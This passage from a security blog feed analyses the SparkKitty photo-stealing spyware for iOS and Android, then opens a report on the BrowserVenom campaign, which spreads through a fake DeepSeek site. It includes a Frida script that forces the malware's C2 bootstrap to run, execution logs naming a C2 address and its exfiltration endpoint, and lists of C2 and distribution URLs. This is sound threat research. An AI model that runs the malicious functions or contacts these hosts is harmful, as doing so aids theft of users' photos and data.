<div id="attachment_116807" style="width: 1339px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116807" class="size-full wp-image-116807" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12.png" alt="Checking the server response and sending a photo" width="1329" height="596" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12.png 1329w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12-300x135.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12-1024x459.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12-768x344.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12-780x350.png 780w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12-740x332.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12-624x280.png 624w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12-800x359.png 800w" sizes="auto, (max-width: 1329px) 100vw, 1329px" /></a><p id="caption-attachment-116807" class="wp-caption-text">Checking the server response and sending a photo</p></div>
<pre class="urvanov-syntax-highlighter-plain-tag">{
code = 0;
data = {
27 = (
);
50002 = (
{
appVersion = "";
cTime = 1696304011000;
id = 491;
imgSubTitle = "";
imgTitle = "\U70ed\U5f00\U5173\Uff08\U65b0\Uff09";
imgType = 50002;
imgUrl = 0;
imgUrlSub = "";
isFullScreen = 0;
isNeed = 1;
isSkip = 1;
langType = all;
operator = 0;
skipUrl = "";
sort = 10000;
source = 0;
type = 0;
uTime = <timestamp>;
}
);
};
dialog = {
cancelAndClose = 0;
cancelBtn = "";
cancelColor = "";
code = 0;
confirmBtn = "";
confirmColor = "";
content = "";
contentColor = "";
time = "";
title = OK;
titleColor = "";
type = 3;
url = "";
};</pre>
<center><strong><em>Sample server response</em></strong></center>
<p>In the response, the <code>imgUrl</code> field contains information about the permission to send photos (1 means granted). Once the Trojan gets the green light, it uses a similar method to what we described earlier: it downloads an encrypted set of C2 addresses and tries sending the images to one of them. By default, it’ll hit the first address on the list. If that one’s down, the malware just moves on to the next. The photo-sending functionality is implemented within the <code>KYDeviceActionManager</code> class.</p>
<div id="attachment_116808" style="width: 1482px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116808" class="size-full wp-image-116808" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13.png" alt="Retrieving and sending photos" width="1472" height="2048" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13.png 1472w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-216x300.png 216w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-736x1024.png 736w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-768x1069.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-1104x1536.png 1104w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-252x350.png 252w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-719x1000.png 719w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-201x280.png 201w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-647x900.png 647w" sizes="auto, (max-width: 1472px) 100vw, 1472px" /></a><p id="caption-attachment-116808" class="wp-caption-text">Retrieving and sending photos</p></div>
<h2 id="suspicious-libcrypto-dylib-mod">Suspicious libcrypto.dylib mod</h2>
<p>During our investigation, we also stumbled upon samples that contained another suspicious library: a modified version of OpenSSL’s cryptographic primitives library, libcrypto.dylib. It showed up under names like <strong>wc.dylib</strong> and <strong>libswiftDarwin.dylib</strong>, had initialization functions obfuscated with an LLVM-based obfuscator, and contained a link to a configuration we’d seen before in other malicious frameworks. It also imported the <code>PHPhotoLibrary</code> class, used for gallery access in the files we mentioned earlier. Sometimes the library was delivered alongside the malicious <strong>AFNetworking.framework/Alamofire.framework</strong>, sometimes not.</p>
<p>Unlike other variants of this malware, this particular library didn’t actually reach out to the malicious configuration file link embedded within it. That meant we had to manually dig for the code responsible for its initial communication with the C2. Even though these library samples are heavily obfuscated, some of them, like the sample with the hash <strong>c5be3ae482d25c6537e08c888a742832</strong>, still had cross-references to the part of the code where the encrypted configuration page URL was used. This function converted a URL string into an <strong>NSString</strong> object.</p>
<div id="attachment_116809" style="width: 602px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004231/sparkkitty-ios14.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116809" class="size-full wp-image-116809" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004231/sparkkitty-ios14.png" alt="Section of obfuscated code for loading the malicious URL" width="592" height="293" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004231/sparkkitty-ios14.png 592w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004231/sparkkitty-ios14-300x148.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004231/sparkkitty-ios14-566x280.png 566w" sizes="auto, (max-width: 592px) 100vw, 592px" /></a><p id="caption-attachment-116809" class="wp-caption-text">Section of obfuscated code for loading the malicious URL</p></div>
<p>With <strong>Frida</strong>, we can call an arbitrary address in the loaded library as if it were a function, but invoking a routine that merely builds an <strong>NSString</strong> proves nothing about the library’s intent. So we followed the cross-references up several levels and called the function that consumed the URL; under the hook it issued a <strong>GET</strong> request to the malicious URL. The server behind that URL was already inactive, so the function could not complete. To let it run to the end, we used Frida to swap the dead URL for a working one whose returned data and decryption we already knew, placed logging hooks on <code>objc_msgSend</code> so that every selector invoked from the library was recorded, and ran the malicious function again. Below is the Frida script we used to do this:</p><pre class="urvanov-syntax-highlighter-plain-tag">// Frida script: trace objc_msgSend calls originating in wc.dylib and swap the
// dead configuration URL for a live one so the C2 bootstrap runs to completion.
var moduleMap = null;   // built lazily; maps backtrace addresses to loaded modules

function traceModule(impl, name)
{
    console.log("Tracing " + name, impl);
    Interceptor.attach(impl, {
        onEnter: function(args) {
            this.logExit = false;   // per-invocation state shared with onLeave
            var bt = Thread.backtrace(this.context, Backtracer.ACCURATE);
            if (!moduleMap) {
                moduleMap = new ModuleMap();
            }
            var modules = bt.map(x => moduleMap.find(x)).filter(x => x != null).map(x => x.name);
            // we want to trace only calls originating from the malware dylib
            if (modules.filter(x => x.includes('wc.dylib')).length > 0) {
                this.logExit = true;
                console.warn("\n*** entering " + name);
                if (name.includes('objc_msgSend')) {
                    // arm64 Objective-C ABI: x0 = receiver, x1 = selector, x2.. = arguments
                    var sel = this.context.x1.readUtf8String();
                    if (sel.includes("stringWithCString:")) {
                        var s = this.context.x2.readUtf8String();
                        if (s.includes('.cn-bj.ufileos.com')) {
                            console.log("Replacing URL: ", s);
                            // keep the buffer referenced from `this` so it is not freed before the callee reads it
                            this.newUrl = Memory.allocUtf8String('https://data-sdk2.oss-accelerate.aliyuncs.com/file/SGTMnH951121');
                            this.context.x2 = this.newUrl;
                            console.log("New URL: ", this.context.x2.readUtf8String());
                        }
                        else
                            console.log(s);
                    }
                }
                // print backtrace
                console.log(bt.map(DebugSymbol.fromAddress).join("\n"));
            }
        },
        onLeave: function(retval) {
            if (this.logExit) {
                console.warn("\n*** exiting ", name);
                // dump the first 64 bytes of the returned object (x0) for inspection
                console.log(this.context.x0.readByteArray(64));
            }
        }
    });
}

var malInited = false;
var malFunc;
function callMalware() {
    if (!malInited) {
        // offsets are specific to the analysed wc.dylib sample: the C2 bootstrap
        // function and the library's objc_msgSend stub
        malFunc = new NativeFunction(base.add(0x7A77CC), 'void', []);
        traceModule(base.add(0x821360), 'objc_msgSend');
        malInited = true;
    }
    malFunc();
}

var mname = "wc.dylib";
var base = Process.enumerateModules().filter(x => x.name.includes(mname))[0].base;
console.log('Base address: ', base);
callMalware();</pre><p>
Our suspicions were confirmed: the malicious function indeed loads and decrypts the C2 address configuration from a given URL. It then uses this C2 for sending device data, following the same pattern we described earlier and using the same AES-256 key. Below is an excerpt from the function’s execution logs.</p><pre class="urvanov-syntax-highlighter-plain-tag">*** entering objc_msgSend
### Creating NSString object with decrypted string
[ 0x20193a010 stringWithCString:"http://84.17.37.155:8081" encoding: ]
0x102781be8 wc.dylib!0x7d1be8 (0x7d1be8)
0x1027590e8 wc.dylib!0x7a90e8 (0x7a90e8)
*** entering objc_msgSend
### Creating NSString with api endpoint decrypted somewhere in code
[ 0x20193a010 stringWithCString:"%@/api/getStatus?buid=%@&appname=%@&userId=%@" encoding: ]
0x10277cc50 wc.dylib!0x7ccc50 (0x7ccc50)
0x102783264 wc.dylib!0x7d3264 (0x7d3264)
### Here sample initiates HTTP request to decrypted C2 address and decrypts its response ###
*** entering objc_msgSend
### Getting server response as data object
[ 0x2022d5078 initWithData:encoding: ]
0x10277f4a4 wc.dylib!0x7cf4a4 (0x7cf4a4)
0x1afafcac4 CFNetwork!0x1dac4 (0x180a6cac4)
*** leaving objc_msgSend
### Server response in bytes
00000000 41 e9 92 01 a2 21 00 00 8c 07 00 00 01 00 00 00 A....!..........
00000010 2e 7b 22 6d 73 67 22 3a 22 73 75 63 63 65 73 73 .{"msg":"success
00000020 22 2c 22 63 6f 64 65 22 3a 30 2c 22 75 73 22 3a ","code":0,"us":
00000030 31 2c 22 73 74 61 74 75 73 22 3a 22 30 22 7d 00 1,"status":"0"}.</pre><p>
The function execution log above clearly shows that it uses an IP address from the encrypted configuration file. Device data is sent to this IP’s <strong>/api/getStatus</strong> endpoint with arguments familiar from previous samples. We also see that the server’s response contains the <code>code</code> and <code>status</code> fields we’ve encountered before. All of this strongly suggests that this library is also involved in stealing user photos. The only thing we haven’t pinpointed yet is the exact condition under which this malicious function activates. At startup, the library contacts a C2 whose address is encrypted within it, sends device information and expects a JSON string in response. At the time of this research, we hadn’t found any samples with an active C2 address, so we don’t know the precise response it’s looking for. However, we assume that this response, or a subsequent one, carries the permission to start sending photos, as the <code>status</code> field does in the other variants.</p>
<h2 id="another-activity-cluster">Another activity cluster?</h2>
<p>During our research, we stumbled upon a significant number of pages offering for download various scam iOS apps in the PWA (progressive web app) format. At first glance, these pages seemed unrelated to the campaign we describe in this article. However, their code bore a striking resemblance to the pages distributing the malicious TikTok version, which prompted us to investigate how users were landing on them. While digging into the traffic sources, we uncovered ads for various scams and Ponzi schemes on popular platforms.</p>
<div id="attachment_116810" style="width: 877px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116810" class="size-full wp-image-116810" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15.png" alt="Scam platform account on YouTube" width="867" height="450" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15.png 867w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15-300x156.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15-768x399.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15-674x350.png 674w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15-740x384.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15-539x280.png 539w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15-800x415.png 800w" sizes="auto, (max-width: 867px) 100vw, 867px" /></a><p id="caption-attachment-116810" class="wp-caption-text">Scam platform account on YouTube</p></div>
<p>Some of these PWA-containing pages also included a section prompting users to download a mobile app. For Android users, the link downloaded an APK file that opened the scam platform via WebView.</p>
<div id="attachment_116811" style="width: 1253px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116811" class="size-full wp-image-116811" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16.png" alt="App download links" width="1243" height="993" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16.png 1243w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-300x240.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-1024x818.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-768x614.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-500x400.png 500w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-438x350.png 438w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-740x591.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-350x280.png 350w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-800x639.png 800w" sizes="auto, (max-width: 1243px) 100vw, 1243px" /></a><p id="caption-attachment-116811" class="wp-caption-text">App download links</p></div>
<p>Beyond just opening scam websites in WebView, these downloaded APKs had another function. The apps requested permission to read storage. Once this was granted, they used the Loader API to register a content download event handler. This handler then selected all JPEG and PNG images. The images were processed using the Google ML Kit library designed for optical character recognition. ML Kit searched for <a href="https://developers.google.com/android/reference/com/google/mlkit/vision/text/Text.TextBlock" target="_blank" rel="noopener">text blocks</a> and then broke them down into lines. If an image contained at least three lines, each with a word of at least three letters, the Trojan would send it to the attackers’ server, whose address was retrieved from Amazon AWS storage.</p>
<div id="attachment_116812" style="width: 999px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116812" class="size-full wp-image-116812" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17.png" alt="Code snippet for photo uploads" width="989" height="788" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17.png 989w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17-300x239.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17-768x612.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17-439x350.png 439w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17-740x590.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17-351x280.png 351w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17-800x637.png 800w" sizes="auto, (max-width: 989px) 100vw, 989px" /></a><p id="caption-attachment-116812" class="wp-caption-text">Code snippet for photo uploads</p></div>
<p>We’re moderately confident that this activity cluster is connected to the one described above. Here’s why:</p>
<ol>
<li>The malicious apps also focus on cryptocurrency themes.</li>
<li>Similar tactics are employed: the C2 address is also hosted in cloud storage, and gallery content is exfiltrated.</li>
<li>The pages distributing iOS PWAs look similar to those used to download malicious TikTok mods.</li>
</ol>
<p>Given this connection between the two activity clusters, we suspect the creators of the apps mentioned earlier might also be spreading them through social media ads.</p>
<h2 id="campaign-goals-and-targets">Campaign goals and targets</h2>
<p>Unlike SparkCat, the spyware we analyzed above doesn’t show direct signs of the attackers being interested in victims’ crypto assets. However, we still believe they’re stealing photos with that exact goal in mind. The following details lead us to these conclusions:</p>
<ol>
<li>A crypto-only store was embedded within the TikTok app alongside the spyware.</li>
<li>Among the apps where the spyware was found, several were crypto-themed. For instance, 币coin in the App Store positions itself as a crypto information tracker, and the SOEX messaging app has various crypto-related features as well.</li>
<li>The main source for distributing the spyware is a network of cookie-cutter app download platforms. During our investigation, we found a significant number of domains that distributed both the described Trojan and <a href="https://en.wikipedia.org/wiki/Progressive_web_app" target="_blank" rel="noopener">PWAs (progressive web apps)</a>. Users were directed to these PWAs from various cryptocurrency scam and Ponzi scheme sites.</li>
</ol>
<p>Our data suggests that the attackers primarily targeted users in Southeast Asia and China. Most of the infected apps we discovered were various Chinese gambling games, TikTok, and adult games. All these apps were originally aimed specifically at users in the regions mentioned above.<br />
Furthermore, we believe this malware is linked to the SparkCat campaign, and here’s our reasoning:</p>
<ul>
<li>Some Android apps infected with SparkKitty were built with the same framework as the apps infected with SparkCat.</li>
<li>In both campaigns, we found the same infected Android apps.</li>
<li>Within the malicious iOS frameworks, we found debug symbols. They included file paths from the attackers’ systems, which pointed to where their projects were being built. These paths match what we previously observed in SparkCat.</li>
</ul>
<h2 id="takeaways">Takeaways</h2>
<p>Threat actors are still actively compromising official app stores, and not just for Android – iOS is also a target. The espionage campaign we uncovered uses various distribution methods: it spreads through apps infected with malicious frameworks/SDKs from unofficial sources, as well as through malicious apps directly on the App Store and Google Play. While not technically or conceptually complex, this campaign has been ongoing since at least the beginning of 2024 and poses a significant threat to users. Unlike the previously discovered SparkCat spyware, this malware isn’t picky about which photos it steals from the gallery. Although we suspect the attackers’ main goal is to find screenshots of crypto wallet seed phrases, other sensitive data could also be present in the stolen images.</p>
<p>Judging by the distribution sources, this spyware primarily targets users in Southeast Asia and China. However, it doesn’t have any technical limitations that would prevent it from attacking users in other regions.</p>
<p>Our security products return the following verdicts when detecting malware associated with this campaign:</p>
<ul>
<li>HEUR:Trojan-Spy.AndroidOS.SparkKitty.*</li>
<li>HEUR:Trojan-Spy.IphoneOS.SparkKitty.*</li>
</ul>
<h2 id="indicators-of-compromise">Indicators of compromise</h2>
<h3 id="infected-android-apps">Infected Android apps</h3>
<h3 id="infected-ios-apps">Infected iOS apps</h3>
<h3 id="malicious-ios-frameworks">Malicious iOS frameworks</h3>
<h3 id="obfuscated-malicious-ios-libraries">Obfuscated malicious iOS libraries</h3>
<h3 id="download-links-for-infected-apps">Download links for infected apps</h3>
<p><a href="https://opentip.kaspersky.com/https%3a%2f%2flt.laoqianf14.top%2fkjnn/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f97f8a3a7cf6e3ca&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://lt.laoqianf14[.]top/KJnn</a><br />
<a href="https://opentip.kaspersky.com/https%3a%2f%2flt.laoqianf15.top%2fkjnn/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______35e5c5f39b02d82e&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://lt.laoqianf15[.]top/KJnn</a><br />
<a href="https://opentip.kaspersky.com/https%3a%2f%2flt.laoqianf51.top%2fkjnn/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c5281f5ff150fb18&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://lt.laoqianf51[.]top/KJnn</a><br />
<a href="https://opentip.kaspersky.com/https%3a%2f%2fyjhjymfjnj.wyxbmh.cn%2f2kzos8%3fa45dd02ac%3dd4f42319a78b6605cabb5696bacb4677/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______be17db98193961d3&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://yjhjymfjnj.wyxbmh[.]cn/2kzos8?a45dd02ac=d4f42319a78b6605cabb5696bacb4677</a><br />
<a href="https://opentip.kaspersky.com/https%3a%2f%2fxt.xinqianf38.top%2frnzr/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e2f45dadfecda51e&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://xt.xinqianf38[.]top/RnZr</a></p>
<h3 id="pages-distributing-trojans">Pages distributing Trojans</h3>
<p><a href="https://opentip.kaspersky.com/https%3a%2f%2faccgngrid.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4c12fb7150e5c0f1&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://accgngrid[.]com</a><br />
<a href="https://opentip.kaspersky.com/https%3a%2f%2fbyteepic.vip/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______65be7022474a217c&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://byteepic[.]vip</a></p>
<h3 id="c2-and-configuration-storage">C2 and configuration storage</h3>
<p>C2:<br />
<a href="https://opentip.kaspersky.com/23.249.28.88/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7c584064a13303bc&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">23.249.28[.]88</a><br />
<a href="https://opentip.kaspersky.com/120.79.8.107/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f5d8a357363127ca&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">120.79.8[.]107</a><br />
<a href="https://opentip.kaspersky.com/23.249.28.200/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______72098a7960daae1f&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">23.249.28[.]200</a><br />
<a href="https://opentip.kaspersky.com/47.119.171.161/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______046145040775168b&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">47.119.171[.]161</a><br />
<a href="https://opentip.kaspersky.com/api.fxsdk.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a83fb595aff96bad&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">api.fxsdk.com</a></p>
<p>Configurations</p>
<h3 id="paths">Paths</h3>
<p>/sdcard/aray/cache/devices/.DEVICES</p>
]]></content:encoded>
<wfw:commentRss>https://securelist.com/sparkkitty-ios-android-malware/116793/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23070415/SL-SparkKitty-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23070415/SL-SparkKitty-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23070415/SL-SparkKitty-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23070415/SL-SparkKitty-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
</item>
<item>
<title>Toxic trend: Another malware threat targets DeepSeek</title>
<link>https://securelist.com/browservenom-mimicks-deepseek-to-use-malicious-proxy/115728/</link>
<comments>https://securelist.com/browservenom-mimicks-deepseek-to-use-malicious-proxy/115728/#respond</comments>
<dc:creator><![CDATA[Lisandro Ubiedo]]></dc:creator>
<pubDate>Wed, 11 Jun 2025 10:00:50 +0000</pubDate>
<category><![CDATA[GReAT research]]></category>
<category><![CDATA[Malware Technologies]]></category>
<category><![CDATA[Microsoft Windows]]></category>
<category><![CDATA[Google Chrome]]></category>
<category><![CDATA[JavaScript]]></category>
<category><![CDATA[Malware Descriptions]]></category>
<category><![CDATA[Malware]]></category>
<category><![CDATA[Encryption]]></category>
<category><![CDATA[CAPTCHA]]></category>
<category><![CDATA[PowerShell]]></category>
<category><![CDATA[Browser]]></category>
<category><![CDATA[Phishing websites]]></category>
<category><![CDATA[Defense evasion]]></category>
<category><![CDATA[LLM]]></category>
<category><![CDATA[AI]]></category>
<category><![CDATA[DeepSeek]]></category>
<category><![CDATA[Windows malware]]></category>
<category><![CDATA[Web threats]]></category>
<guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=115728</guid>
<description><![CDATA[Kaspersky GReAT experts discovered a new malicious implant: BrowserVenom. It enables a proxy in browsers like Chrome and Mozilla and spreads through a DeepSeek-mimicking phishing website.]]></description>
<content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/11094352/browservenom-deepseek-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
<p>DeepSeek-R1 is one of the most popular LLMs right now. Users of all experience levels look for chatbot websites on search engines, and threat actors have started abusing the popularity of LLMs. We previously <a href="https://securelist.com/backdoors-and-stealers-prey-on-deepseek-and-grok/115801/" target="_blank" rel="noopener">reported attacks with malware</a> being spread under the guise of DeepSeek to attract victims. The malicious domains spread through X posts and general browsing.</p>
<p>But lately, threat actors have begun using malvertising to exploit the demand for chatbots. For instance, we have recently discovered a new malicious campaign distributing previously unknown malware through a fake DeepSeek-R1 LLM environment installer. The malware is delivered via a phishing site that masquerades as the official DeepSeek homepage. The website was promoted in the search results via Google Ads. The attacks ultimately aim to install <strong>BrowserVenom</strong>, an implant that reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to manipulate the victim’s network traffic and collect data.</p>
<h2 id="phishing-lure">Phishing lure</h2>
<p>The infection was launched from a phishing site, located at <code>https[:]//deepseek-platform[.]com</code>. It was spread via malvertising, intentionally placed as the top result when a user searched for “deepseek r1”, thus taking advantage of the model’s popularity. Once the user reaches the site, a check is performed to identify the victim’s operating system. If the user is running Windows, they will be presented with only one active button, “Try now”. We have also seen layouts for other operating systems with slight changes in wording, but all mislead the user into clicking the button.</p>
<div id="attachment_116767" style="width: 1884px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116767" class="size-full wp-image-116767" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1.png" alt="Malicious website mimicking DeepSeek" width="1874" height="2048" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1.png 1874w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-275x300.png 275w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-937x1024.png 937w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-768x839.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-1406x1536.png 1406w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-320x350.png 320w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-740x809.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-256x280.png 256w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-800x874.png 800w" sizes="auto, (max-width: 1874px) 100vw, 1874px" /></a><p id="caption-attachment-116767" class="wp-caption-text">Malicious website mimicking DeepSeek</p></div>
<p>Clicking this button will take the user to a CAPTCHA anti-bot screen. The code for this screen is obfuscated JavaScript, which performs a series of checks to make sure that the user is not a bot. We found other scripts on the same malicious domain signaling that this is not the first iteration of such campaigns. After successfully solving the CAPTCHA, the user is redirected to the <code>proxy1.php</code> URL path with a “Download now” button. Clicking that results in downloading the malicious installer named <code>AI_Launcher_1.21.exe</code> from the following URL: <code>https://r1deepseek-ai[.]com/gg/cc/AI_Launcher_1.21.exe</code>.</p>
<p>We examined the source code of both the phishing and distribution websites and discovered comments in Russian related to the websites’ functionality, which suggests that they are developed by Russian-speaking threat actors.</p>
<h2 id="malicious-installer">Malicious installer</h2>
